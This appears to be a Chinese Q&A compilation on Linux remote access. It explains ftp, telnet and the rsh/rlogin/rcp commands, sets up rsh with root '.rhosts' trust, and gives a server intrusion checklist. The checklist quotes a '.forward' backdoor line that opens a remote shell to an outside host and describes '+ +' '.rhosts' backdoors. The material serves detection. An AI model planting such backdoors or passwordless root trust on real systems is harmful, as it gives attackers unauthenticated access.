linuxrhosts

Ⅰ 關於linux的（操作過程中的Linux命令必須完整給出）

Linux系統越來越受到電腦用戶的歡迎，於是很多人開始學習Linux時，學習linux，你可能會遇到Linux網路操作命令問題，這里將介紹Linux網路操作命令知識，在這里拿出來和大家分享一下。計算機網路的主要優點是能夠實現資源和信息的共享，並且用戶可以遠程訪問信息。Linux提供了一組強有力的網路命令來為用戶服務，這些工具能夠幫助用戶登錄到遠程計算機上、傳輸文件和執行遠程命令等。介紹下列幾個常用的有關網路操作命令：ftp 傳輸文件
telnet 登錄到遠程計算機上
r - 使用各種遠程命令
netstat 查看網路的狀況
nslookup 查詢域名和IP地址的對應
finger 查詢某個使用者的信息
ping 查詢某個機器是否在工作使用ftp命令進行遠程文件傳輸
ftp命令是標準的文件傳輸協議的用戶介面。ftp是在TCP/IP網路上的計算機之間傳輸文件的簡單有效的方法。它允許用戶傳輸ASCII文件和二進制文件。 在ftp會話過程中，用戶可以通過使用ftp客戶程序連接到另一台計算機上。從此，用戶可以在目錄中上下移動、列出目錄內容、把文件從遠程機拷貝到本地機上、把文件從本地機傳輸到遠程系統中。需要注意的是，如果用戶沒有那個文件的存取許可權，就不能從遠程系統中獲得文件或向遠程系統傳輸文件。 為了使用ftp來傳輸文件，用戶必須知道遠程計算機上的合法用戶名和口令。這個用戶名/口令的組合用來確認ftp 會話，並用來確定用戶對要傳輸的文件可以進行什麼樣的訪問。另外，用戶顯然需要知道對其進行ftp 會話的計算機的名字或IP地址。Ftp命令的功能是在本地機和遠程機之間傳送文件。該命令的一般格式如下：
$ ftp 主機名/IP其中「主機名/IP」是所要連接的遠程機的主機名或IP地址。在命令行中，主機名屬於選項，如果指定主機名，ftp將試圖與遠程機的ftp服務程序進行連接；如果沒有指定主機名，ftp將給出提示符，等待用戶輸入命令： $ ftp ftp > 此時在ftp>提示符後面輸入open命令加主機名或IP地址，將試圖連接指定的主機。 不管使用哪一種方法，如果連接成功，需要在遠程機上登錄。用戶如果在遠程機上有帳號，就可以通過ftp使用這一帳號並需要提供口令。
在遠程機上的用戶帳號的讀寫許可權決定該用戶在遠程機上能下載什麼文件和將上載文件放到哪個目錄中。 如果沒有遠程機的專用登錄帳號，許多ftp站點設有可以使用的特殊帳號。這個帳號的登錄名為anonymous（也稱為匿名ftp），當使用這一帳號時，要求輸入email地址作為口令。 如果遠程系統提供匿名ftp服務，用戶使用這項服務可以登錄到特殊的，供公開使用的目錄。一般專門提供兩個目錄：pub目錄和incoming目錄。pub目錄包含該站點供公眾使用的所有文件，incoming目錄存放上載到該站點的文件。 一旦用戶使用ftp在遠程站點上登錄成功，將得到「ftp>」提示符。現在可以自由使用ftp提供的命令，可以用 help命令取得可供使用的命令清單，也可以在 help命令後面指定具體的命令名稱，獲得這條命令的說明。
最常用的命令有：
ls 列出遠程機的當前目錄
cd 在遠程機上改變工作目錄
lcd 在本地機上改變工作目錄
ascii 設置文件傳輸方式為ASCII模式
binary 設置文件傳輸方式為二進制模式
close終止當前的ftp會話
hash 每次傳輸完數據緩沖區中的數據後就顯示一個#號
get（mget） 從遠程機傳送指定文件到本地機
put（mput） 從本地機傳送指定文件到遠程機
open 連接遠程ftp站點
quit斷開與遠程機的連接並退出ftp
? 顯示本地幫助信息
! 轉到Shell中下面簡單將ftp常用命令作一簡介。
啟動ftp會話 open命令用於打開一個與遠程主機的會話。該命令的一般格式是： open 主機名/IP 如果在ftp 會話期間要與一個以上的站點連接，通常只用不帶參數的ftp命令。如果在會話期間只想與一台計算機連接，那麼在命令行上指定遠程主機名或IP地址作為ftp命令的參數。 終止ftp會話 close、disconnect、quit和bye命令用於終止與遠程機的會話。close和disronnect命令關閉與遠程機的連接，但是使用戶留在本地計算機的ftp程序中。quit和bye命令都關閉用戶與遠程機的連接，然後退出用戶機上的ftp 程序。 改變目錄 「cd [目錄]」命令用於在ftp會話期間改變遠程機上的目錄，lcd命令改變本地目錄，使用戶能指定查找或放置本地文件的位置。 遠程目錄列表 ls命令列出遠程目錄的內容，就像使用一個交互shell中的ls命令一樣。ls命令的一般格式是： ls [目錄] [本地文件] 如果指定了目錄作為參數，那麼ls就列出該目錄的內容。如果給出一個本地文件的名字，那麼這個目錄列表被放入本地機上您指定的這個文件中。 從遠程系統獲取文件 get和mget命令用於從遠程機上獲取文件。get命令的一般格式為： get 文件名 您還可以給出本地文件名，這個文件名是這個要獲取的文件在您的本地機上創建時的文件名。如果您不給出一個本地文件名，那麼就使用遠程文件原來的名字。 mget命令一次獲取多個遠程文件。mget命令的一般格式為： mget 文件名列表 使用用空格分隔的或帶通配符的文件名列表來指定要獲取的文件，對其中的每個文件都要求用戶確認是否傳送。 向遠程系統發送文件 put和mput命令用於向遠程機發送文件。Put命令的一般格式為： put 文件名 mput命令一次發送多個本地文件，mput命令的一般格式為： mput 文件名列表 使用用空格分隔的或帶通配符的文件名列表來指定要發送的文件。對其中的每個文件都要求用戶確認是否發送。 改變文件傳輸模式 默認情況下，ftp按ASCII模式傳輸文件，用戶也可以指定其他模式。ascii和brinary命令的功能是設置傳輸的模式。用ASCII模式傳輸文件對純文本是非常好的，但為避免對二進制文件的破壞，用戶可以以二進制模式傳輸文件。 檢查傳輸狀態 傳輸大型文件時，可能會發現讓ftp提供關於傳輸情況的反饋信息是非常有用的。hash命令使ftp在每次傳輸完數據緩沖區中的數據後，就在屏幕上列印一個#字元。本命令在發送和接收文件時都可以使用。 ftp中的本地命令 當您使用ftp時，字元「!」用於向本地機上的命令shell傳送一個命令。如果用戶處在ftp會話中，需要shell做某些事，就很有用。例如用戶要建立一個目錄來保存接收到的文件。如果輸入!mkdir new_dir，那麼Linux就在用戶當前的本地目錄中創建一個名為new_dir 的目錄。從遠程機grunthos下載二進制數據文件的典型對話過程如下：
$ ftp grunthos Connected to grunthos 220 grunthos ftp server Name （grunthos:pc）: anonymous 33l Guest login ok, send your complete e-mail address as password. Password: 230 Guest 1ogin ok, access restrictions apply. Remote system type is UNIX. ftp > cd pub 250 CWD command successful. ftp > ls 200 PORT command successful. l50 opening ASCII mode data connection for /bin/1s. total ll4 rog1 rog2 226 Transfer comp1ete . ftp > binary 200 type set to I. ftp > hash Hash mark printing on （1024 bytes/hash mark）. ftp > get rog1 200 PORT command successfu1. 150 opening BINARY mode data connection for rogl （l4684 bytes）. # # # # # # # # # # # # # 226 Transfer complete. 14684 bytes received in 0.0473 secs （3e + 02 Kbytes/sec） ftp > quit 22l Goodbye.使用telnet命令訪問遠程計算機
用戶使用telnet命令進行遠程登錄。該命令允許用戶使用telnet協議在遠程計算機之間進行通信，用戶可以通過網路在遠程計算機上登錄，就像登錄到本地機上執行命令一樣。 為了通過telnet登錄到遠程計算機上，必須知道遠程機上的合法用戶名和口令。雖然有些系統確實為遠程用戶提供登錄功能，但出於對安全的考慮，要限制來賓的操作許可權，因此，這種情況下能使用的功能是很少的。當允許遠程用戶登錄時，系統通常把這些用戶放在一個受限制的shell中，以防系統被懷有惡意的或不小心的用戶破壞。 用戶還可以使用telnet從遠程站點登錄到自己的計算機上，檢查電子郵件、編輯文件和運行程序，就像在本地登錄一樣。
但是，用戶只能使用基於終端的環境而不是X Wndows環境，telnet只為普通終端提供終端模擬，而不支持 X Wndow等圖形環境。 telnet命令的一般形式為： telnet 主機名/IP 其中「主機名/IP」是要連接的遠程機的主機名或IP地址。如果這一命令執行成功，將從遠程機上得到login：提示符。 使用telnet命令登錄的過程如下： $ telnet 主機名/IP 啟動telnet會話。 一旦telnet成功地連接到遠程系統上，就顯示登錄信息並提示用戶輸人用戶名和口令。如果用戶名和口令輸入正確，就能成功登錄並在遠程系統上工作。 在telnet提示符後面可以輸入很多命令，用來控制telnet會話過程，在telnet聯機幫助手冊中對這些命令有詳細的說明。下面是一台Linux計算機上的telnet會話舉例：
$ telnet server. somewhere. com Trying 127.0.0.1… Connected to serve. somewhere. com. Escape character is \'?]\'. 「TurboLinux release 4. 0 （Colgate） kernel 2.0.18 on an I486 login: bubba password: Last login:Mon Nov l5 20:50:43 for localhost Linux 2. 0.6. （Posix）. server: ~$ server: ~$ logout Connection closed by foreign host $用戶結束了遠程會話後，一定要確保使用logout命令退出遠程系統。然後telnet報告遠程會話被關閉，並返回到用戶的本地機的Shell提示符下。 r-系列命令 除ftp和telnet以外，還可以使用r-系列命令訪問遠程計算機和在網路上交換文件。 使用r-系列命令需要特別注意，因為如果用戶不小心，就會造成嚴重的安全漏洞。用戶發出一個r-系列命令後，遠程系統檢查名為/etc/hosts.equiv的文件，以查看用戶的主機是否列在這個文件中。如果它沒有找到用戶的主機，就檢查遠程機上同名用戶的主目錄中名為．rhosts的文件，看是否包括該用戶的主機。如果該用戶的主機包括在這兩個文件中的任何一個之中，該用戶執行r-系列命令就不用提供口令。雖然用戶每次訪問遠程機時不用鍵入口令可能是非常方便的，但是它也可能會帶來嚴重的安全問題。我們建議用戶在建立/etc/hosts.equiv和.rhosts文件之前，仔細考慮r-命令隱含的安全問題。rlogin命令
rlogin 是「remote login」（遠程登錄）的縮寫。該命令與telnet命令很相似，允許用戶啟動遠程系統上的交互命令會話。rlogin 的一般格式是：
rlogin [ -8EKLdx ] [ -e char ] [-k realm ] [ - l username ] host一般最常用的格式是： rlogin host 該命令中各選項的含義為：
-8 此選項始終允許8位輸入數據通道。該選項允許發送格式化的ANSI字元和其他的特殊代碼。如果不用這個選項，除非遠端的終止和啟動字元不是或，否則就去掉奇偶校驗位。
-E 停止把任何字元當作轉義字元。當和-8選項一起使用時，它提供一個完全的透明連接。
-K 關閉所有的Kerberos確認。只有與使用Kerberos 確認協議的主機連接時才使用這個選項。
-L 允許rlogin會話在litout模式中運行。要了解更多信息，請查閱tty聯機幫助。
-d 打開與遠程主機進行通信的TCP sockets的socket調試。要了解更多信息，請查閱setsockopt的聯機幫助。
-e 為rlogin會話設置轉義字元，默認的轉義字元是「~」，用戶可以指定一個文字字元或一個\\nnn形式的八進制數。
-k 請求rlogin獲得在指定區域內的遠程主機的Kerberos許可，而不是獲得由krb_realmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos 許可。
-x 為所有通過rlogin會話傳送的數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。rsh命令
rsh是「remote shell」（遠程 shell）的縮寫。 該命令在指定的遠程主機上啟動一個shell並執行用戶在rsh命令行中指定的命令。如果用戶沒有給出要執行的命令，rsh就用rlogin命令使用戶登錄到遠程機上。
rsh命令的一般格式是：
rsh [-Kdnx] [-k realm] [-l username] host [command]
一般常用的格式是：
rsh host [command ]
command可以是從shell提示符下鍵人的任何Linux命令。
rsh命令中各選項的含義如下：
-K 關閉所有的Kerbero確認。該選項只在與使用Kerbero確認的主機連接時才使用。
-d 打開與遠程主機進行通信的TCP sockets的socket調試。要了解更多的信息，請查閱setsockopt的聯機幫助。
-k 請求rsh獲得在指定區域內的遠程主機的Kerberos許可，而不是獲得由krb_relmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos許可。
-l 預設情況下，遠程用戶名與本地用戶名相同。本選項允許指定遠程用戶名，如果指定了遠程用戶名，則使用Kerberos 確認，與在rlogin命令中一樣。
-n 重定向來自特殊設備/dev/null的輸入。
-x 為傳送的所有數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。 Linux把標准輸入放入rsh命令中,並把它拷貝到要遠程執行的命令的標准輸入中。它把遠程命令的標准輸出拷貝到rsh的標准輸出中。它還把遠程標准錯誤拷貝到本地標准錯誤文件中。任何退出、中止和中斷信號都被送到遠程命令中。當遠程命令終止了，rsh也就終止了。rcp命令
rcp代表「remote file 」（遠程文件拷貝）。該命令用於在計算機之間拷貝文件。
rcp命令有兩種格式。第一種格式用於文件到文件的拷貝；第二種格式用於把文件或目錄拷貝到另一個目錄中。
rcp命令的一般格式是：
rcp [-px] [-k realm] file1 file2 rcp [-px] [-r] [-k realm] file
directory 每個文件或目錄參數既可以是遠程文件名也可以是本地文件名。遠程文件名具有如下形式：rname@rhost：path，其中rname是遠程用戶名，rhost是遠程計算機名，path是這個文件的路徑。
rcp命令的各選項含義如下：
-r 遞歸地把源目錄中的所有內容拷貝到目的目錄中。要使用這個選項，目的必須是一個目錄。
-p 試圖保留源文件的修改時間和模式，忽略umask。
-k 請求rcp獲得在指定區域內的遠程主機的Kerberos 許可，而不是獲得由krb_relmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos許可。
-x 為傳送的所有數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。 如果在文件名中指定的路徑不是完整的路徑名，那麼這個路徑被解釋為相對遠程機上同名用戶的主目錄。如果沒有給出遠程用戶名，就使用當前用戶名。如果遠程機上的路徑包含特殊shell字元，需要用反斜線（\\）、雙引號（」）或單引號（』）括起來，使所有的shell元字元都能被遠程地解釋。 需要說明的是，rcp不提示輸入口令，它通過rsh命令來執行拷貝。 - Turbolinux 提供稿件。通過本文你就了解Linux網路操作命令，希望對你有所幫助。

Ⅱ 如何配置linux的rsh服務

如何配置rsh服務

redhat linux下配置rsh和rcp- -

1:安裝前准備:
機器A:192.168.0.4 (安裝rsh server)
機器B:192.168.0.10 (rsh client 調用執行192.168.0.4的命令)

2: 首先確認機器A是否安裝rsh包:
[root@mg04 root]# rpm -aq |grep rsh
rsh-0.17-14
rsh-server-0.17-14
如果沒有安裝以上兩個包，請找到相關軟體安裝(如果是LINUX，可以從安裝碟中找到)
安裝包:
rpm -ivh rsh-0.17-5 (linux 操作系統)
rpm -ivh rsh-server-0.17-5 (linux 操作系統)

3:確認是否啟動rsh 服務:
方法一:
使用命令setup，查看service是否將[*] rsh 加上*，如果加上*表示可以啟動。
/etc/rc.d/init.d/xinetd restart 或者 service xinetd restart
方法二:
rsh 屬於xinetd服務,可以直接修改/etc/xinetd.d/rsh腳本文件。
service shell
{
disable = no
socket_type = stream
wait = no
user = root
log_on_success += USERID
log_on_failure += USERID
server = /usr/sbin/in.rshd
}
當然方法很多，目的就是使用rsh服務能啟動。
/etc/rc.d/init.d/xinetd restart
檢查是否啟動: rsh server 監聽和TCP 是514。
[root@mg04 root]# netstat -an |grep 514
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN
如果能看到514在監聽說明伺服器已經啟動。

4:配置rsh server:
修改/etc/securetty文件: echo rsh >>/etc/securetty
如果打算用root作為rsh用戶的話:
先用root登錄到機器A中進行以下操作:
cd ~/
echo "192.168.0.10 root" >>.rhosts 允許192.168.0.10 以root訪問
echo "192.168.0.4 root" >>.rhosts

重啟rsh server.

5:測試和注意的問題:
登錄到b機器進行測試: rsh -l root 192.168.0.204 ps -ef
看是否能看到結果。如果看到
[root@mg04 etc]# rsh -l root 192.168.0.204 ps -ef
Permission denied.
這是由於權許可權問題，一般是由於 .rhosts沒有配置正確。.rhosts一般位於
rsh server伺服器相對應賬號目錄下比如root(與.bash_profile在同一目錄)

rsh在執行命令有時會找不到。rsh 在調用命令是最好使用絕對路徑。默認搜索路徑為:
[root@mg04 etc]# rsh -l root 192.168.0.4 env |grep PATH
PATH=/usr/bin:/bin
rh8.0下rcp的用法設置
只對root用戶生效
1、在雙方root用戶根目錄下建立.rhosts文件,並將雙方的hostname加進去.在此之前應在雙方的/etc/hosts文件中加入對方的IP和hostname
2、把rsh服務啟動起來，redhat默認是不啟動的。方法：用執行ntsysv命令，在rsh選項前用空格鍵選中，確定退出。 然後執行：service xinetd restart即可。
3、到/etc/pam.d/目錄下，把rsh文件中的auth required /lib/security/pam_securetty.so一行用「#

Ⅲ linux 如何創建 .rhosts

以"."開頭的文件是隱藏的，你可以用ls -a 命令，這樣你就能看到了。-a 是列出目錄下的所有文件。包括隱藏的文件

Ⅳ Linux 遠程登錄的服務叫什麼埠是多少

linux遠程登錄使用的是SSHD服務來，此服務需要在linux服務端開啟後，客戶端使源用工具連接服務端即可。

SSHD的默百認埠度是22，所以連接是填寫的知默認埠22就行了。但是如果服務端改了默認埠，道則用客戶端軟體連接的時候需要更換為相應的埠。

通過遠程登錄，本地計算機便能與網路上另一遠程計算機取得「聯系」，並進行程序交互。進行遠程登錄的用戶叫做本地用戶，本地用戶登錄進入的系統叫做遠地系統。

(4)linuxrhosts擴展閱讀：

每一個遠程機器都有一個文件（/etc/hosts.equiv），包括了一個信任主機名集共享用戶名的列表。本地用戶名和遠程用戶名相同的用戶，可以在 /etc/hosts.equiv 文件中列出的任何機器上登錄到遠程主機，而不需要密碼口令。

個人用戶可以在主目錄下設置相似的個人文件（通常叫 .rhosts）。此文件中的每一行都包含了兩個名字 —主機名和用戶名，兩者用空格分開。.rhosts 文件中的每一行允許一個登錄到主機名的名為用戶名的用戶無需密碼就可以登陸到遠程主機。

如果在遠程機的 /etc/hosts.equiv 文件中找不到本地主機名，並且在遠程用戶的 .rhosts 文件中找不到本地用戶名和主機名時，遠程機就會提示密碼。列在 /etc/hosts.equiv 和 .rhosts 文件中的主機名必須是列在主機資料庫中的正式主機名，昵稱均不許使用。為安全起見，.rhosts 文件必須歸遠程用或根所有。

Ⅳ Linux伺服器是否被攻擊怎麼判斷

1、檢查系統密碼文件

首先從明顯的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。

檢查一下passwd文件中有哪些特權用戶，系統中uid為0的用戶都會被顯示出來。

1

awk –F:』$3==0{print$1}』/etc/passwd

順便再檢查一下系統里有沒有空口令帳戶：

1

awk –F: 『length($2)==0{print$1}』/etc/shadow

2、查看一下進程，看看有沒有奇怪的進程

重點查看進程：ps –aef | grep inetd

inetd是UNIX系統的守護進程，正常的inetd的pid都比較靠前，如果你看到輸出了一個類似inetd –s /tmp/.xxx之類的進程，著重看inetd –s後面的內容。在正常情況下，LINUX系統中的inetd服務後面是沒有-s參數的，當然也沒有用inetd去啟動某個文件；而solaris系統中也僅僅是inetd –s，同樣沒有用inetd去啟動某個特定的文件；如果你使用ps命令看到inetd啟動了某個文件，而你自己又沒有用inetd啟動這個文件，那就說明已經有人入侵了你的系統，並且以root許可權起了一個簡單的後門。

輸入ps –aef 查看輸出信息，尤其注意有沒有以./xxx開頭的進程。一旦發現異樣的進程，經檢查為入侵者留下的後門程序，立即運行kill –9 pid 開殺死該進程，然後再運行ps –aef查看該進程是否被殺死；一旦此類進程出現殺死以後又重新啟動的現象，則證明系統被人放置了自動啟動程序的腳本。這個時候要進行仔細查找：find / -name 程序名 –print，假設系統真的被入侵者放置了後門，根據找到的程序所在的目錄，會找到很多有趣的東東J

UNIX下隱藏進程有的時候通過替換ps文件來做，檢測這種方法涉及到檢查文件完整性，稍後我們再討論這種方法。

接下來根據找到入侵者在伺服器上的文件目錄，一步一步進行追蹤。

3、檢查系統守護進程

檢查/etc/inetd.conf文件，輸入：cat /etc/inetd.conf | grep –v 「^#」，輸出的信息就是你這台機器所開啟的遠程服務。

一般入侵者可以通過直接替換in.xxx程序來創建一個後門，比如用/bin/sh 替換掉in.telnetd，然後重新啟動inetd服務，那麼telnet到伺服器上的所有用戶將不用輸入用戶名和密碼而直接獲得一個rootshell。

4、檢查網路連接和監聽埠

輸入netstat -an，列出本機所有的連接和監聽的埠，查看有沒有非法連接。

輸入netstat –rn，查看本機的路由、網關設置是否正確。

輸入 ifconfig –a，查看網卡設置。

5、檢查系統日誌

命令last | more查看在正常情況下登錄到本機的所有用戶的歷史記錄。但last命令依賴於syslog進程，這已經成為入侵者攻擊的重要目標。入侵者通常會停止系統的syslog，查看系統syslog進程的情況，判斷syslog上次啟動的時間是否正常，因為syslog是以root身份執行的，如果發現syslog被非法動過，那說明有重大的入侵事件。

在linux下輸入ls –al /var/log

在solaris下輸入 ls –al /var/adm

檢查wtmp utmp，包括messgae等文件的完整性和修改時間是否正常，這也是手工擦除入侵痕跡的一種方法。

6、檢查系統中的core文件

通過發送畸形請求來攻擊伺服器的某一服務來入侵系統是一種常規的入侵方法，典型的RPC攻擊就是通過這種方式。這種方式有一定的成功率，也就是說它並不能100%保證成功入侵系統，而且通常會在伺服器相應目錄下產生core文件，全局查找系統中的core文件，輸入find / -name core –exec ls –l {} ; 依據core所在的目錄、查詢core文件來判斷是否有入侵行為。

7、.rhosts和.forward

這是兩種比較著名的後門文件，如果想檢查你的系統是否被入侵者安裝了後門，不妨全局查找這兩個文件：

find / -name 「.rhosts」 –print

find / -name 「.forward」 –print

在某用戶的$HOME下，.rhosts文件中僅包含兩個+號是非常危險的，如果你的系統上開了513埠（rlogin埠，和telnet作用相同），那麼任意是誰都可以用這個用戶登錄到你的系統上而不需要任何驗證。

看到這里如果想要深入的做安全加固服務以及安全部署

就必須找專業做伺服器的安全公司來處理了國內也就Sine安全和綠盟比較專業提供。

Unix下在.forward文件里放入命令是重新獲得訪問的常用方法在某一 用戶$HOME下的.forward可能設置如下:

username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"

這種方法的變形包括改變系統的mail的別名文件(通常位於/etc/aliases). 注意這只是一種簡單的變換. 更為高級的能夠從.forward中運行簡單腳本實現在標准輸入執行任意命令(小部分預處理後).利用smrsh可以有效的制止這種後門(雖然如果允許可以自運行的elm's filter或procmail類程序, 很有可能還有問題。在Solaris系統下，如果你運行如下命令：

ln -s /var/mail/luser ~/.forward

然後設置vacation有效，那麼/var/mail/luser就會被拷貝到~/.forward，同時會附加"|/usr/bin/vacation me"，舊的symlink被移到~/.forward..BACKUP中。

直接刪除掉這兩個文件也可以。

8、檢查系統文件完整性

檢查文件的完整性有多種方法，通常我們通過輸入ls –l 文件名來查詢和比較文件，這種方法雖然簡單，但還是有一定的實用性。但是如果ls文件都已經被替換了就比較麻煩。在LINUX下可以用rpm –V `rpm –qf 文件名` 來查詢，國家查詢的結果是否正常來判斷文件是否完整。在LINUX下使用rpm來檢查文件的完整性的方法也很多，這里不一一贅述，可以man rpm來獲得更多的格式。

UNIX系統中，/bin/login是被入侵者經常替換作為後門的文件，接下來談一下login後門 ：

UNIX里，Login程序通常用來對telnet來的用戶進行口令驗證。入侵者獲取login的源代碼並修改，使它在比較輸入口令與存儲口令時先檢查後門口令。如果用戶敲入後門口令，它將忽視管理員設置的口令讓你長驅直入：這將允許入侵者進入任何賬號，甚至是root目錄。由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmP前產生的一個訪問，所以入侵者可以登錄獲取shell卻不會暴露該賬號。管理員注意到這種後門後，使用」strings」命令搜索login程序以尋找文本信息。許多情況下後門口令會原形畢露。入侵者又會開始加密或者更改隱藏口令，使strings命令失效。所以許多管理員利用MD5校驗和檢測這種後門。UNIX系統中有md5sum命令，輸入md5sum 文件名檢查該文件的md5簽名。它的使用格式如下：md5sum –b 使用二進制方式閱讀文件；md5sum –c 逆向檢查MD5簽名；md5sum –t 使用文本方式閱讀文件。

在前面提到過守護進程，對於守護進程配置文件inetd.conf中沒有被注釋掉的行要進行仔細比較，舉個簡單的例子，如果你開放了telnet服務，守護進程配置文件中就會有一句：telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd，檢查該文件的完整性，入侵者往往通過替換守護進程中允許的服務文件來為自己創建一個後門。

LINUX系統中的/etc/crontab也是經常被入侵者利用的一個文件，檢查該文件的完整性，可以直接cat /etc/crontab，仔細閱讀該文件有沒有被入侵者利用來做其他的事情。

不替換login等文件而直接使用進程來啟動後門的方法有一個缺陷，即系統一旦重新啟動，這個進程就被殺死了，所以得讓這個後門在系統啟動的時候也啟動起來。通常通過檢查/etc/rc.d下的文件來查看系統啟動的時候是不是帶有後門程序；這個方法怎麼有點象查windows下的trojan？

說到這里，另外提一下，如果在某一目錄下發現有屬性為這樣的文件：-rwsr-xr-x 1 root root xxx .sh，這個表明任何用戶進來以後運行這個文件都可以獲得一個rootshell，這就是setuid文件。運行 find –perm 4000 –print對此類文件進行全局查找，然後刪除這樣的文件。

9、檢查內核級後門

如果你的系統被人安裝了這種後門，通常都是比較討厭的，我常常就在想，遇到這種情況還是重新安裝系統算了J，言歸正傳，首先，檢查系統載入的模塊，在LINUX系統下使用lsmod命令，在solaris系統下使用modinfo命令來查看。這里需要說明的是，一般默認安裝的LINUX載入的模塊都比較少，通常就是網卡的驅動；而solaris下就很多，沒別的辦法，只有一條一條地去分析。對內核進行加固後，應禁止插入或刪除模塊，從而保護系統的安全，否則入侵者將有可能再次對系統調用進行替換。我們可以通過替換create_mole()和delete_mole()來達到上述目的。另外，對這個內核進行加固模塊時應盡早進行，以防系統調用已經被入侵者替換。如果系統被載入了後門模塊，但是在模塊列表/proc/mole里又看不到它們，有可能是使用了hack工具來移除載入的模塊，大名鼎鼎的knark工具包就有移除載入模塊的工具。出現這種情況，需要仔細查找/proc目錄，根據查找到的文件和經驗來判斷被隱藏和偽裝的進程。Knark後門模塊就在/proc/knark目錄，當然可能這個目錄是隱藏的。

Ⅵ linux系統通過ssh連接其他設備問題

vim /etc/ssh/sshd_config
可以看到下面的說明：

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
如果要忽略用戶已知的主機 就把上面這個選項的#去掉，然後把版no改為yes。不知權是否可行？
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

Ⅶ linux網路命令host命令作用於哪一層

計算機網路的主要優點是能夠實現資源和信息的共享，並且用戶可以遠程訪問信息。Linux提供了一組強有力的網路命令來為用戶服務，這些工具能夠幫助用戶登錄到遠程計算機上、傳輸文件和執行遠程命令等。 本章介紹下列幾個常用的有關網路操作的命令：

ftp 傳輸文件
telnet 登錄到遠程計算機上
r - 使用各種遠程命令
netstat 查看網路的狀況
nslookup 查詢域名和IP地址的對應
finger 查詢某個使用者的信息
ping 查詢某個機器是否在工作

使用ftp命令進行遠程文件傳輸
ftp命令是標準的文件傳輸協議的用戶介面。ftp是在TCP/IP網路上的計算機之間傳輸文件的簡單有效的方法。它允許用戶傳輸ASCII文件和二進制文件。 在ftp會話過程中，用戶可以通過使用ftp客戶程序連接到另一台計算機上。從此，用戶可以在目錄中上下移動、列出目錄內容、把文件從遠程機拷貝到本地機上、把文件從本地機傳輸到遠程系統中。

需要注意的是，如果用戶沒有那個文件的存取許可權，就不能從遠程系統中獲得文件或向遠程系統傳輸文件。 為了使用ftp來傳輸文件，用戶必須知道遠程計算機上的合法用戶名和口令。這個用戶名/口令的組合用來確認ftp 會話，並用來確定用戶對要傳輸的文件可以進行什麼樣的訪問。另外，用戶顯然需要知道對其進行ftp 會話的計算機的名字或IP地址。

Ftp命令的功能是在本地機和遠程機之間傳送文件。該命令的一般格式如下：
$ ftp 主機名/IP

其中「主機名/IP」是所要連接的遠程機的主機名或IP地址。在命令行中，主機名屬於選項，如果指定主機名，ftp將試圖與遠程機的ftp服務程序進行連接；如果沒有指定主機名，ftp將給出提示符，等待用戶輸入命令： $ ftp ftp > 此時在ftp>提示符後面輸入open命令加主機名或IP地址，將試圖連接指定的主機。 不管使用哪一種方法，如果連接成功，需要在遠程機上登錄。用戶如果在遠程機上有帳號，就可以通過ftp使用這一帳號並需要提供口令。
在遠程機上的用戶帳號的讀寫許可權決定該用戶在遠程機上能下載什麼文件和將上載文件放到哪個目錄中。 如果沒有遠程機的專用登錄帳號，許多ftp站點設有可以使用的特殊帳號。這個帳號的登錄名為anonymous（也稱為匿名ftp），當使用這一帳號時，要求輸入email地址作為口令。 如果遠程系統提供匿名ftp服務，用戶使用這項服務可以登錄到特殊的，供公開使用的目錄。

一般專門提供兩個目錄：pub目錄和incoming目錄。pub目錄包含該站點供公眾使用的所有文件，incoming目錄存放上載到該站點的文件。 一旦用戶使用ftp在遠程站點上登錄成功，將得到「ftp>」提示符。現在可以自由使用ftp提供的命令，可以用 help命令取得可供使用的命令清單，也可以在 help命令後面指定具體的命令名稱，獲得這條命令的說明。
最常用的命令有：
ls 列出遠程機的當前目錄
cd 在遠程機上改變工作目錄
lcd 在本地機上改變工作目錄
ascii 設置文件傳輸方式為ASCII模式
binary 設置文件傳輸方式為二進制模式
close終止當前的ftp會話
hash 每次傳輸完數據緩沖區中的數據後就顯示一個#號
get（mget） 從遠程機傳送指定文件到本地機
put（mput） 從本地機傳送指定文件到遠程機
open 連接遠程ftp站點
quit斷開與遠程機的連接並退出ftp
? 顯示本地幫助信息
! 轉到Shell中

下面簡單將ftp常用命令作一簡介。
啟動ftp會話 open命令用於打開一個與遠程主機的會話。該命令的一般格式是： open 主機名/IP 如果在ftp 會話期間要與一個以上的站點連接，通常只用不帶參數的ftp命令。如果在會話期間只想與一台計算機連接，那麼在命令行上指定遠程主機名或IP地址作為ftp命令的參數。 終止ftp會話 close、disconnect、quit和bye命令用於終止與遠程機的會話。close和disronnect命令關閉與遠程機的連接，但是使用戶留在本地計算機的ftp程序中。quit和bye命令都關閉用戶與遠程機的連接，然後退出用戶機上的ftp 程序。 改變目錄 「cd [目錄]」命令用於在ftp會話期間改變遠程機上的目錄，lcd命令改變本地目錄，使用戶能指定查找或放置本地文件的位置。 遠程目錄列表 ls命令列出遠程目錄的內容，就像使用一個交互shell中的ls命令一樣。ls命令的一般格式是： ls [目錄] [本地文件] 如果指定了目錄作為參數，那麼ls就列出該目錄的內容。如果給出一個本地文件的名字，那麼這個目錄列表被放入本地機上您指定的這個文件中。 從遠程系統獲取文件 get和mget命令用於從遠程機上獲取文件。get命令的一般格式為： get 文件名 您還可以給出本地文件名，這個文件名是這個要獲取的文件在您的本地機上創建時的文件名。如果您不給出一個本地文件名，那麼就使用遠程文件原來的名字。 mget命令一次獲取多個遠程文件。mget命令的一般格式為： mget 文件名列表 使用用空格分隔的或帶通配符的文件名列表來指定要獲取的文件，對其中的每個文件都要求用戶確認是否傳送。 向遠程系統發送文件 put和mput命令用於向遠程機發送文件。Put命令的一般格式為： put 文件名 